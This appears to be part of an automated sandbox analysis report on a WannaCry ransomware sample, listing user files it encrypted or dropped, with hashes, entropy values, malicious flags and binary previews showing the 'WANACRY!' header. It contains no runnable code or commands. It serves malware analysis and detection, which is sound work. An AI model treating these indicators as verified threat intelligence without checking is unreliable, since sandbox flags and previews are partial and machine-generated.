                                                  Preview:WANACRY!......!$..;..G.]q....jd@...9..d.Et.m...Gm.b.j../E,#.A"...Z..{...[s.i..ug.....oF.kk.ci....yu.vng..q..6.....&..t%.r.#.nts.........Z.m/....J.....5..n.[.:.:]...F.D..4.~d.B.E....7 ...".P..u8q.)B,c.6...).V..B.1.oO.U.c..fFX.b3...h.d.t.T. g.....zc.....R................i,.]CR..p..I.P .az]...... ...p3..H(.<_......r.....4...Y.V......NQ..........)..V.%Y.s..t/.v.W...*%..F.D..gB...[....."8I.S."U....K...O.l........Q...9.......%S..3'B]g=t.....f8.:..O!\$ ...g...Qi.....E..+.....94.0Dk.....#......v...9..4......J@lV.,.EH4..u......G...gitX.H|.T..Ds.&D..s.h..$.R.B.y..K..\/tt.~T...Qn...>G%2?M,6.T.6.OytP=....9.o...b.j.....D.[.D...e..w.u_...3..M.m..B2@\..f..ioeI|.V.~..%...Au.........}.z.?...W{..TP>.W.D.L%.O.7...5.........K.\...A..+...i..o^.X.1xLc{.o......a..}!.....\..M.i.....e...v.N.J.p+...0....A...A..gO...1XT+0rc(......Q..]....T..'d>3.-|R......&..7..F..i.....}..Q..q)f. >...k3h,.:.....4....+lBW+.7L..(.1%..*S...v.d..`.2..:.......-0.r.....X."g~.:.

                                                  C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8392789198126795
                                                  Encrypted:false
                                                  SSDEEP:24:bkiD6eCCD+YiNjJ1RqS2doN07NODAMxjphsBDjz4ksC6Ju/2gU2m9m+s0MswRI3:bkDrCD+YiNt11aW4oBpSDMnu+Imr1
                                                  MD5:12E8027A4D2F1292CC39394C76B2E3E3
                                                  SHA1:8CE9A2E1E04D58A798A34543FA6AD313AA7ABEDE
                                                  SHA-256:F3786950FDFBFC583F39E04D693140FF577E734E30A58C6BB58FB1E40CDCD0B9
                                                  SHA-512:2559E44192A1C374D6AE71267D5903F346567AEBECBD14127C23F6A77AFB3F74B50CC6F512610DF7C5CB6C512892CB804531F403FB44A518770D3B1B6958B45A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......!$..;..G.]q....jd@...9..d.Et.m...Gm.b.j../E,#.A"...Z..{...[s.i..ug.....oF.kk.ci....yu.vng..q..6.....&..t%.r.#.nts.........Z.m/....J.....5..n.[.:.:]...F.D..4.~d.B.E....7 ...".P..u8q.)B,c.6...).V..B.1.oO.U.c..fFX.b3...h.d.t.T. g.....zc.....R................i,.]CR..p..I.P .az]...... ...p3..H(.<_......r.....4...Y.V......NQ..........)..V.%Y.s..t/.v.W...*%..F.D..gB...[....."8I.S."U....K...O.l........Q...9.......%S..3'B]g=t.....f8.:..O!\$ ...g...Qi.....E..+.....94.0Dk.....#......v...9..4......J@lV.,.EH4..u......G...gitX.H|.T..Ds.&D..s.h..$.R.B.y..K..\/tt.~T...Qn...>G%2?M,6.T.6.OytP=....9.o...b.j.....D.[.D...e..w.u_...3..M.m..B2@\..f..ioeI|.V.~..%...Au.........}.z.?...W{..TP>.W.D.L%.O.7...5.........K.\...A..+...i..o^.X.1xLc{.o......a..}!.....\..M.i.....e...v.N.J.p+...0....A...A..gO...1XT+0rc(......Q..]....T..'d>3.-|R......&..7..F..i.....}..Q..q)f. >...k3h,.:.....4....+lBW+.7L..(.1%..*S...v.d..`.2..:.......-0.r.....X."g~.:.

                                                  C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.826350738111068
                                                  Encrypted:false
                                                  SSDEEP:12:YruZFeeEax/HHEboxwL8cNA6rUfMENZP/ikLcYMdUPnubgc6Zip1yQ9+a25rtDm6:YruZ4KxPk2EN/GnJWcyp1yS+V3nCi
                                                  MD5:166C30A46A36C94357E0F1D9CDEB0C88
                                                  SHA1:4A5AEA9D5A129F7BAD1F9AE7E6B6FA39B066FB88
                                                  SHA-256:2082B8733FC817CC4FF6BBE04E7148D8B076AD6AFD32F2FE92C50D0E46346F61
                                                  SHA-512:584D2A89B1B4AC532640D2BA6D144516E64B567AA718C2A782501571FBAAF58E6E92C86074EA1AB8A14E995DE228FF8AECA1A70EA2449383F113D5E9C30AAB4A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:c*......K.WM.0.n...Q....B....2.p...E.0g-".+%X.<s.N..m..?9\.XR....j=l..jb.W...d,tK.....0...;../......gl..Fg^.~..t...T.B.......D..*...Y.".ZR.......;.}.M.S..>._sY.WP.A...3.........G.lJ.a..|.>...a?..I.J.9s..a......X.....~.7......).0[.~.d....%d&.d....L...{.=:.M.....'F...h.....fw=...YC.....(..`.!.F!..m...G..T....:w....~;.IQ.0j.Z}.B.g....OBu.4....1 .5...F..9.~"R......[.QS.M..._0....&.A.Q.rG.....d.XWi..A.H....(..x`.GU..n.g.!.......:a...!6..v9..u.G.?...x....q..x....J.e....X........g.8+4....}.J......U.XyQ0.D..'.Oc.+q..).=\`.......hS.y..\.Cte.;.,@..8y..0+//....R.N.....u.?._...L..?......@n...S?I.$J.X.dN.m*..5.4.12..c/.*.......' .S........X..b.(.Uu.T....12y..e....%...@..^{.(.7.B..........z}...b.......1...........5.)lN..q ..J...)...3.....w..\..X;j.F.A.:.6.;.F!.......[!..<..P..@.W.[.A.%..:..2^..\F.........$B.j.K..........ph.=..D0plY.wx.....J...vP......+o.o4e...=..'o.X...Zw.T.P.8.n....m...&Z..P.nx.;..N.Vxo.}#....K.....Z(..&..IV._.9j.....A.....p..`....

                                                  C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.853731784647624
                                                  Encrypted:false
                                                  SSDEEP:24:bkhA+ZY0DukS9uZ+3RmUq3tJmp0fD5TyTPBlhZtVMPrgEvqLt:bkhA/0DukSsZxUPpuDd8LEPrgEvqLt
                                                  MD5:84B04E6235B576D881C9380FF863A557
                                                  SHA1:673049FE8E17F101C9D4298F9A65DCFCA9E4D4EF
                                                  SHA-256:0633875F00D733E4172D19BA1FF31D7B7250AF8205E115CDFF28F3AB27231DAD
                                                  SHA-512:18376A1F0B60224A8EFD1E88B093C07B0787396E6520E5F4CF1CDC1A83CD82BFCFE6E6056BB9B4BC2B31665197BF7CEFDBD90F957343B9B210CECB1356439828
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......7.E%...:>sja...L..x.0.......6ju..W]..G.s...!.. O..)..5u.J9.. ..'.JAo...i4...8...^.?..O.n.MM..._cs;.^D#......W.../.l.>.t"&....~.M..+{.He.{.gn..Q`..M...X`...$."...j..[.U.$...{#Yu...)...E?}...-P...*j......QH........0CP..9...}........V>..~`L.D.V............2'....F ...K..>in?r!"..^..B.a.B..a.........@&'."z..eO....^%.$.......E.........vL.B..l..!i./..8O.Vc+-..D.....'.%.......B...@.p..dX.R.....~U.}.....7]A.t./...9....}.F.?.....N@...*.......T.....@..,.E}..;A.S..w...+.K.M.k..RxH.&.:1..=.4.6U..3.|S..MSO]".4.X(.G.....5...l.._....jGq.....O..#.L.TL.l)I.....q.IWf.y.j.`..].RXj..93..G.+U...J.J....@N.=.G/.Q.u...c.d.V5...A..`..q,...{h../m...R5.]..q .'b.0..Z..*K.b...p1|..o.I... ..P.B.{.v....k.....S.a.P...^..9.x....Q`....L..=..?LL.9w.Ze.S:..]$&1... ..{1..]r.3"].8...D.%....|.^.`.Y......W.....-0X....,..b....7.U..k0hR........G...g.:..2......wRe.......w.w.!d.....[sCK........-..... ..../........#9..N...]g_.u8.....D.j..c.t.F6..o.Qj ).C}..i6..1.L

                                                  C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.853731784647624
                                                  Encrypted:false
                                                  SSDEEP:24:bkhA+ZY0DukS9uZ+3RmUq3tJmp0fD5TyTPBlhZtVMPrgEvqLt:bkhA/0DukSsZxUPpuDd8LEPrgEvqLt
                                                  MD5:84B04E6235B576D881C9380FF863A557
                                                  SHA1:673049FE8E17F101C9D4298F9A65DCFCA9E4D4EF
                                                  SHA-256:0633875F00D733E4172D19BA1FF31D7B7250AF8205E115CDFF28F3AB27231DAD
                                                  SHA-512:18376A1F0B60224A8EFD1E88B093C07B0787396E6520E5F4CF1CDC1A83CD82BFCFE6E6056BB9B4BC2B31665197BF7CEFDBD90F957343B9B210CECB1356439828
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......7.E%...:>sja...L..x.0.......6ju..W]..G.s...!.. O..)..5u.J9.. ..'.JAo...i4...8...^.?..O.n.MM..._cs;.^D#......W.../.l.>.t"&....~.M..+{.He.{.gn..Q`..M...X`...$."...j..[.U.$...{#Yu...)...E?}...-P...*j......QH........0CP..9...}........V>..~`L.D.V............2'....F ...K..>in?r!"..^..B.a.B..a.........@&'."z..eO....^%.$.......E.........vL.B..l..!i./..8O.Vc+-..D.....'.%.......B...@.p..dX.R.....~U.}.....7]A.t./...9....}.F.?.....N@...*.......T.....@..,.E}..;A.S..w...+.K.M.k..RxH.&.:1..=.4.6U..3.|S..MSO]".4.X(.G.....5...l.._....jGq.....O..#.L.TL.l)I.....q.IWf.y.j.`..].RXj..93..G.+U...J.J....@N.=.G/.Q.u...c.d.V5...A..`..q,...{h../m...R5.]..q .'b.0..Z..*K.b...p1|..o.I... ..P.B.{.v....k.....S.a.P...^..9.x....Q`....L..=..?LL.9w.Ze.S:..]$&1... ..{1..]r.3"].8...D.%....|.^.`.Y......W.....-0X....,..b....7.U..k0hR........G...g.:..2......wRe.......w.w.!d.....[sCK........-..... ..../........#9..N...]g_.u8.....D.j..c.t.F6..o.Qj ).C}..i6..1.L

                                                  C:\Users\user\Desktop\NVWZAPQSQL.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.827138986530992
                                                  Encrypted:false
                                                  SSDEEP:24:wtCE+sU3w+zUgHK71/MWELrWYqI18n7Xav+9Pv9SkNRuItwHv:sCE+sU38h/MW3YqI18jamZlSk/tYv
                                                  MD5:C91BF4314249D2EEDEDC77C69825BB54
                                                  SHA1:267E54AC46199A225AFE502ABD091E9110664C7C
                                                  SHA-256:BF72B3A5D071B1E075DF7181693D496A5660E4EFF0E3AF9AC34F60BFE6D79CB5
                                                  SHA-512:6A8A3E57DA22410EDD4C929AFD10ED76880010B5455FD620471C6330C3E577600F2C8303ED97748A446755DB84E522B159B4C0DD8AFF2C212018B4F7741D7DED
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:.3.>Kr.P.......l.E..a.q.?7..K.Ux.+e}B.M.....c.w.W.}:......H..o.[)q......H}L..RWvz]....&x..b...I..'.....fH.$.E.?.Mp.3OG....<]h.L...cO.^.g.S....KI....].d...._"..bL..6.\........P<.I.W."u..lEE..P......%`|.......>...'-.....4............)...j.=.Nto...h.?..T.V.&.E..kdf..gO..g....*..._.....(.....6..-nr.*^...w.4..........K..>.L0S....0<44..F...{......sG..%3..~t.]1.6d.J..J.?.:.......7.s+.n..y..%.y..+. :....0.L....?.f...;.}...1...Xz..y...l...i.hA?..O..c.?y...a}.n.*.7...2.......F.w.....`().j..\..-iO..Xx.$...Q...Q.~{V.7&.S.f1.?f ...y+;.........5..|o.#V.D.}...y.x"A.N..7... ...p.7&..Y,.Qj........8....*..z..t...)9.6......M..;..bO.Tv.?.ku:....eOxj...A7...Z.'.G.a...%.;L...y...\...........@........T..u.d...6.z.....l.....J.1....IA...U..>0p......Nm..oM#.....y#..:{.3..p=v6..9.pk..y=u...}.t,G...r(.W..H../:...=@...}./..72.[a..>..:.a..E.fO......6.&.#{.@...vNQh.....-..E7........x.l..C.9C.G..y.!K?..D.sm..bCjo.n...3.sX..R~...W.^...oQX.%.}.kaH.Y..y1a...F.....!d.(U...\.

                                                  C:\Users\user\Desktop\NVWZAPQSQL.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.843788769474621
                                                  Encrypted:false
                                                  SSDEEP:24:bkngIl/joZWo6l8ZhTzZhVEmuqJDe2EWW9tMAY6wu+0LHgs2VxhI:bknl/joZzlZhBhVEmumDe2XW9iuvLohI
                                                  MD5:24619C16C028273D5E4C0B038C76C301
                                                  SHA1:9B3FCC23C54477DF2A2A55A1B2D3B5CF59A30890
                                                  SHA-256:C968F6094792CE0FBB1E3CE821A48E7C9C33AE2194A8FEA25A741B5859D9C196
                                                  SHA-512:85435CE80009F613E661ECD68BF4C22006124BF8BE8E9259D3D3F3BC32F146A5C9630B02463FA84CE0769DC0D4329FCB6FF292C8ADB1BB0110E9005E3CFD0CE6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....cL]...T`.L........}.5lGq.....l...N.....ZZ..Y>..m5..."..K..>lK.....+.1.5+W.%8.'P.ztPYo..n.t..h...d;<Y.ntH....g..WRtD<.h.:...........ucA..l....R.5...kT.z.|v.Z.Hg.5..........n.@....<....Yw.xs.N#.?T.....H..Z..:..N._...'.S.......j`..[...gV...n.................~.....O...?3`.n.G.._a}..A..E.#Ff...t.R.i......B.Hj..,hd.......F.k}.hxA...Z...W.Z..h.Z"X|.C.......nA...._.<..ir(.2.\....0...3...7......u..]...=....#.:P.|.*@*...'B..?M'..~R.(#*\..B..pD.),.JP._..n.Qbd.r.g1.<...E....y.........%.f.?.S...O.Q.j...Q......A...c.........G!..../D..r.(&(b.g..#x.!.%d.`.=........a....,.-O} aa.JX.W..$o...wv...@.........v...C*1E.W....5.......'.5.H.4xj..|B....@.-.xM.s..n...C*.?..b6.4f.....s.....^.....q....j......Jl.<.j;...Y[..O..........u.....O[".q}....`2.KTe.....T...;.F....@..u...x.E.I=8]J3...@.........&[EA.......|..;.#.[..".......1.S..|x..x.:...7...T..]Y...kab.p..'..u{.....P...S]+.c~...5...[q=.....I..w...BZsF.1J....u...;....t..ES...5...0p.cE....h...\

                                                  C:\Users\user\Desktop\NVWZAPQSQL.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.843788769474621
                                                  Encrypted:false
                                                  SSDEEP:24:bkngIl/joZWo6l8ZhTzZhVEmuqJDe2EWW9tMAY6wu+0LHgs2VxhI:bknl/joZzlZhBhVEmumDe2XW9iuvLohI
                                                  MD5:24619C16C028273D5E4C0B038C76C301
                                                  SHA1:9B3FCC23C54477DF2A2A55A1B2D3B5CF59A30890
                                                  SHA-256:C968F6094792CE0FBB1E3CE821A48E7C9C33AE2194A8FEA25A741B5859D9C196
                                                  SHA-512:85435CE80009F613E661ECD68BF4C22006124BF8BE8E9259D3D3F3BC32F146A5C9630B02463FA84CE0769DC0D4329FCB6FF292C8ADB1BB0110E9005E3CFD0CE6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....cL]...T`.L........}.5lGq.....l...N.....ZZ..Y>..m5..."..K..>lK.....+.1.5+W.%8.'P.ztPYo..n.t..h...d;<Y.ntH....g..WRtD<.h.:...........ucA..l....R.5...kT.z.|v.Z.Hg.5..........n.@....<....Yw.xs.N#.?T.....H..Z..:..N._...'.S.......j`..[...gV...n.................~.....O...?3`.n.G.._a}..A..E.#Ff...t.R.i......B.Hj..,hd.......F.k}.hxA...Z...W.Z..h.Z"X|.C.......nA...._.<..ir(.2.\....0...3...7......u..]...=....#.:P.|.*@*...'B..?M'..~R.(#*\..B..pD.),.JP._..n.Qbd.r.g1.<...E....y.........%.f.?.S...O.Q.j...Q......A...c.........G!..../D..r.(&(b.g..#x.!.%d.`.=........a....,.-O} aa.JX.W..$o...wv...@.........v...C*1E.W....5.......'.5.H.4xj..|B....@.-.xM.s..n...C*.?..b6.4f.....s.....^.....q....j......Jl.<.j;...Y[..O..........u.....O[".q}....`2.KTe.....T...;.F....@..u...x.E.I=8]J3...@.........&[EA.......|..;.#.[..".......1.S..|x..x.:...7...T..]Y...kab.p..'..u{.....P...S]+.c~...5...[q=.....I..w...BZsF.1J....u...;....t..ES...5...0p.cE....h...\

                                                  C:\Users\user\Desktop\NVWZAPQSQL.mp3

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.805035461004647
                                                  Encrypted:false
                                                  SSDEEP:12:kjw8faCyaIJ/AaD3qXVVJzjBtOVhI+s/HW+aOTcU6WqQxQ5MJ9oIPFNePOrpCOzm:kjmLoq63sVhw5TcNvQFnreWVCOdloh
                                                  MD5:7485113F60BE889E2FDC4C9E9A574067
                                                  SHA1:8452EB15A0E83D51A3145E7197EAB8AD4D0AB153
                                                  SHA-256:B93DFBA4341FE40ADA18AA969743BC51F7C9E6345D54323EABE23E44E5BEA52C
                                                  SHA-512:8AEBD4C62F3E0EF0D51C1CDD58616CFF42648594A80252D194D61EAEC9640DC69C8CA15AAF814C9C0AAD0FAFA94D880E164CF0C06BFB80F32B32C87E448DCABC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:7..w#.AX.=t "t~.5X.....~M.....X.T.....<8.C.?.....G.d.?...W..e....C.s..C......0.`....&/1..'.....x.m..j<U.Ew6,.z...a.J....4. .>.C.N......\S|... G...^..Tg...6....}P.V......T0.* .nvz..]%...4.H..l(..f.5..r.(......BW`.=...z.C.-ojOO....h..0'....\7).TF.(S.x...B7...S3.S....Sc..q.....I.#D..Z8-...Z.g\w.5._.0.p,...T;n.....z......'4V....Sa.`x.W.....wh.#.....i........9/.T.\6.Y......)......a...,...(.*..B..\.\.f+.....`h...|...e.v..,..O........0.k..:^...ked...f.'..3..3..A..~..*J.e1:cU..u.......'...+~KV..I..Xj..6...O..'.."R..k....<.9..D1........QL..]...."....[.9...?.h*......:...>I.:...|.S%....~.#..!.X.|A.K;......|...l.....1./....1~....u.N..Q.o....'.......;.2m....G........X@kd..bi/uI.. ......`.C2.' ..e.a..h.g. .`.8..N.TV~P(......+......Q......\%,.$f.N.L...fj..~F.|5.v....H..(5...P4Dq.@T..O..]..V...........hY.8zTh..-.......8$..P.T..x$..J......a.6..<X....<,.;a.......x.=...V. ^.XY.....q^d....-=......P..OK=..c.I...2.nx.:.<'....-.[..F..JSh.U...,..%7.P.dc.{=..W......

                                                  C:\Users\user\Desktop\NVWZAPQSQL.mp3.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848800785540179
                                                  Encrypted:false
                                                  SSDEEP:24:bkTAeGHkx9b94PIZUG9EYaDJGEt4pX/fGi1CCKoKk+X3eXzK5cRTFRBsN7u+:bkjvb94PqXuJ1tavbRsHkm4TFRqd
                                                  MD5:9BD4F66C8D9D260F2C315286C91285B3
                                                  SHA1:29DE5CC33D0215C3496C2B70252B2E36C1023F9C
                                                  SHA-256:A97ABA92B7F0172A81CE74C4BA10D1550A91D85E78839230C536F1E2AA05A72E
                                                  SHA-512:B500050462C5A6D818D2A89A3A44B754F45D501331BC7ED0C92B77B2C4C18D86DBC89D7B51F7646845F2895048C89EDC0FA2AF9A9E4DF394FF8A7322409DBFC6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....C?..K).e.....E...<...+...6.....*..3.<$..g......v.3.s....`,.Y..#{(......,K@hG..1..V..z...1.O...>..Nj....&..........QZ..........Z@.^....S.DV.D'.....`...U.U...R...S..\f...7..2i.L.k.....1.FWs.D.W..}.&...K..LpH...Q.......T.w...p....vT..9....'..................Ca@.5Y.|... ....u27LQ.!..>p.x...n..h..*.A$..J)b.>(....>.....4A}../......K..9u.g.)..g.&.+.Q.m~.. b.c..6......$.n`.l..h.....Iw{cg.2......'&.O..S......K...4.RA.........Lv.u1...ZD....viJ.5v..|...p....F.....9+.|..b....@..}@..Te]...]..t....b.F.....cX...@.jb5..mc......QW../.......}\9.j#.6.}\}......1s..#.(.6.<n..F).`.j..o-#..nP..;Sm...e..^u.9)U......yL)'..Sa..(.1h.&...Z....rl....].*...6|.r.~.(E.....c.I%.o.o.X..$...9.cd.....5.'D...]...fl>....4....:Z..l<.O.[9.C..E..v.....s......F.>.r'~^....d%Z.D..X.6g.83.6(B...2U.&is...5u.;...A..&..!G......X.>1...^.....O.....8..c....*...A.......lK.1..>...B.L.Sv1..z..a4...g.`Zy&[T9.K4.......k..0$..M...7(.R:..,...e/.l.:B..J....z9...b..r.....ca.D.

                                                  C:\Users\user\Desktop\NVWZAPQSQL.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.848800785540179
                                                  Encrypted:false
                                                  SSDEEP:24:bkTAeGHkx9b94PIZUG9EYaDJGEt4pX/fGi1CCKoKk+X3eXzK5cRTFRBsN7u+:bkjvb94PqXuJ1tavbRsHkm4TFRqd
                                                  MD5:9BD4F66C8D9D260F2C315286C91285B3
                                                  SHA1:29DE5CC33D0215C3496C2B70252B2E36C1023F9C
                                                  SHA-256:A97ABA92B7F0172A81CE74C4BA10D1550A91D85E78839230C536F1E2AA05A72E
                                                  SHA-512:B500050462C5A6D818D2A89A3A44B754F45D501331BC7ED0C92B77B2C4C18D86DBC89D7B51F7646845F2895048C89EDC0FA2AF9A9E4DF394FF8A7322409DBFC6
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....C?..K).e.....E...<...+...6.....*..3.<$..g......v.3.s....`,.Y..#{(......,K@hG..1..V..z...1.O...>..Nj....&..........QZ..........Z@.^....S.DV.D'.....`...U.U...R...S..\f...7..2i.L.k.....1.FWs.D.W..}.&...K..LpH...Q.......T.w...p....vT..9....'..................Ca@.5Y.|... ....u27LQ.!..>p.x...n..h..*.A$..J)b.>(....>.....4A}../......K..9u.g.)..g.&.+.Q.m~.. b.c..6......$.n`.l..h.....Iw{cg.2......'&.O..S......K...4.RA.........Lv.u1...ZD....viJ.5v..|...p....F.....9+.|..b....@..}@..Te]...]..t....b.F.....cX...@.jb5..mc......QW../.......}\9.j#.6.}\}......1s..#.(.6.<n..F).`.j..o-#..nP..;Sm...e..^u.9)U......yL)'..Sa..(.1h.&...Z....rl....].*...6|.r.~.(E.....c.I%.o.o.X..$...9.cd.....5.'D...]...fl>....4....:Z..l<.O.[9.C..E..v.....s......F.>.r'~^....d%Z.D..X.6g.83.6(B...2U.&is...5u.;...A..&..!G......X.>1...^.....O.....8..c....*...A.......lK.1..>...B.L.Sv1..z..a4...g.`Zy&[T9.K4.......k..0$..M...7(.R:..,...e/.l.:B..J....z9...b..r.....ca.D.

                                                  C:\Users\user\Desktop\PIVFAGEAAV.jpg

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1026
                                                  Entropy (8bit):7.774742916772408
                                                  Encrypted:false
                                                  SSDEEP:24:+V6at8Qu1/llHc3EXXMk7m9fo5Mvs/VNA4Yukqv:U6OHS/lO+XZ7m9fo5MU/v
                                                  MD5:97F5921D5A7DC61DAB021FF6BB6A0214
                                                  SHA1:59ECF2D69C98EB3D44492E621994A7E89AF57878
                                                  SHA-256:1BBEA9E06F9167E05BB9FF219909BEC059738EEA3BBF2AD5E8BF54A08066B157
                                                  SHA-512:15E230A62F8491A937865E0657287768F98A6F473F12BF1D8342E91A36CA173695C31F3EC2D4F65653B0B0E728DF53EA9C4CD6F91F33702C2C5ADE11D1DE644A
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:>..i/..D.dUT.'.m.....k.....Qb..Y.0n..P.....).f...u.d.p:.<.S...1h1..T..m.!K1....B.k..#.un)..x.......n=...../....h...b.w...gE..bI..{~.^.A.E.oT......5.m../}...L.J....{D..9....0.W.......uu...C......vNp.L$~4.I......I.X../{o.0.~.GO..TA.v....(....qd3q...t........o ..D13h$a.Q~.~@.Y..._......$@U..KSS..7)Ko....#]&..+(3..p`..e.....M.8.'..../....Ax....<..P.*..Y.....$x.....p....7........p...C..q.9......&.w.i..g#!.<....s...x4.*Aa.Sk.T..QN......r..]{.......3.J....!..M....r...A...w..e..[>.|..l.k...l1j.bQ?<..G3..e/g.....*..$....j.'.Sb.L'Q.).?:...=#..:PF.Rj=.w....KX..o~..)*.*..5](...]'.bv?.6...EC...i....."..V%.t...}..?(..&......u..tdu...."4{..(../E..-..k....;. ..p.c..3...${.?.....$....v.G..g.(.I+ ..5&+.. .........Lo....+J....H...WW.s`5......I... ...q.OM.~k"....1..~..N.2...+e.5G.E....N..n..S..).c.3.....2~..~...v|.,v>.....v..w......%6..F#<Gq. 5u.p..3..Z.D.cV.x[&.]b.G/.@..C....HY...o...uQ...6.K...G.1|....O..5.>..<.BSt....>.E...l.1Gd...8E...|ZJ........O..i".<a..?h5.].

                                                  C:\Users\user\Desktop\PIVFAGEAAV.jpg.WNCRY (copy)

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8310369084733065
                                                  Encrypted:false
                                                  SSDEEP:24:bkYEHXhwHvSm2C6ygNRLlJ7GriZQGq5Vn+/NDkCEsRciJjhAAA:bkYyXhV/jhJ7GWZjqMDtEsRckjFA
                                                  MD5:1A7D475B62BFC9A83B2931B55487F7AE
                                                  SHA1:2FEB2FDA6A52CEBF5FC3FC7DCF25DB1F15BE27AE
                                                  SHA-256:5BDDC4748BAD5264B840A6B6D74ECEBF31FB2A396313166CC9BCB1FCFE853AF0
                                                  SHA-512:EAA9068EF6ACD6371B5CE7AD7E4465F7AA928C2F3DA0B2E0C3749535DB2A7CA8D249409F27B79441A45658B8A13398BBC22C88D486A7E8C7D3A4CC08208613A3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....].8M~.VSq...j.X......_....e$a...Y.....9.._.d..^......D.!......-....E .s&.."3...../..+o.JY.ON.(.qE.G..z..+1Pd+q[..../z-..+..#Y....*;.....[>B..R..6/...W>#.H.......9o.....4........../..d....d.2.T..bW....n.5.@..........'....o.X.e.5C..y....<..m............gA....*........ xO..9.....RrS..Z8.zc.K.......}..Y...bJ.v......~X.Tz..~.g..jY.....S..B..x.@..k....E.n)..R.....^.2....]F8.......:...p#.....P..F...U|.Q..uq....v.. .5.,.cbM......_S.$...$R...k..D.. ..N_.^..Vzn..._(..1.%.Xi..x.w..R..../..*p.V..He........yN.#.0....S..3.....z.`...O./.:...o.gl ..,..N....e4..Z.d..5.s.....6..M..X...X......I+H.,K.sF5.R..@..H..1.yz...r..re.....YaH....W...>.L......4..1.......&q)%....)..d8HYm0..W:...\....VZ.m^3u......O.>~....q...v~.x{k`..e=..4.$?`...=T.+.bzwZ.....ZBo..0,....L8..:.Zk...dhF.`.0}.S!.!.OT.l~a.Q.x.M!7...,.-..m...n..j.{Z....;..Q3g.Q96{PO...3...U...mEcA..HZ.B..\zJ.7.e.ph.@.J.q..vo.0Z.jWT.k./>.bi..._FWE..3xm..:LJL}.A.I..P...~.-X....s.&zYT.w....+.`..

                                                  C:\Users\user\Desktop\PIVFAGEAAV.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8310369084733065
                                                  Encrypted:false
                                                  SSDEEP:24:bkYEHXhwHvSm2C6ygNRLlJ7GriZQGq5Vn+/NDkCEsRciJjhAAA:bkYyXhV/jhJ7GWZjqMDtEsRckjFA
                                                  MD5:1A7D475B62BFC9A83B2931B55487F7AE
                                                  SHA1:2FEB2FDA6A52CEBF5FC3FC7DCF25DB1F15BE27AE
                                                  SHA-256:5BDDC4748BAD5264B840A6B6D74ECEBF31FB2A396313166CC9BCB1FCFE853AF0
                                                  SHA-512:EAA9068EF6ACD6371B5CE7AD7E4465F7AA928C2F3DA0B2E0C3749535DB2A7CA8D249409F27B79441A45658B8A13398BBC22C88D486A7E8C7D3A4CC08208613A3
                                                  Malicious:false
                                                  Reputation:unknown
